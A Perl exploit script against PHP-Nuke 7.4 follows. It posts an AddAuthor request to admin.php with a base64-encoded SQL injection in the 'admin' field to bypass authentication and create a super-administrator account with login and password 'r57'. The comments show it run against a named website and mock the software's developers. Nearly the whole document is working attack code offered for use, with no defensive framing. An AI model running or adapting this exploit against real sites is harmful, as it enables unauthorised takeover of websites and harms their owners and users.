#!/usr/bin/perl

# r57phpnuke74.pl - very very lame PHP-Nuke 7.4 "add-admin" exploit
# -----------------------------------------------------------------
# by 1dt.w0lf .. RusH security team .. http://rst.void.ru
#
# this coded just for fun
# -----------------------------------------------------------------
# C:\>r57phpnuke74.pl http://volgorod.khn.ru/admin.php
# DONE!
# Now go to http://volgorod.khn.ru/admin.php and login via 'r57' as name and 'r57' as password
# jabi-dabi-duuuu ... stupid php-nuke coders =(
# -----------------------------------------------------------------
#
# *** php-nuke must be run via mysql > 4.0

use LWP::UserAgent;

if (@ARGV != 1)
 {
 print "usage: $0 [path_to_admin.php]\n";
 exit;
 }

$path = $ARGV[0];

$php_nuke = LWP::UserAgent->new() or die;
$php_nuke->post(
"$path", 
{
"add_aid"         => "r57",                          ### login
"add_name"        => "r57",                          ### name
"add_pwd"         => "r57",                          ### password
"add_email"       => "r00t\@r00t.br",                ### mail
"admin"           => "eCcgVU5JT04gU0VMRUNUIDEvKjox", ### magic... =)
"add_radminsuper" => "1",                            ### yeap supa admina
"op"              => "AddAuthor"                     ### add me baby
}
); 

print "DONE!\nNow go to $path and login via 'r57' as name and 'r57' as password";
exit;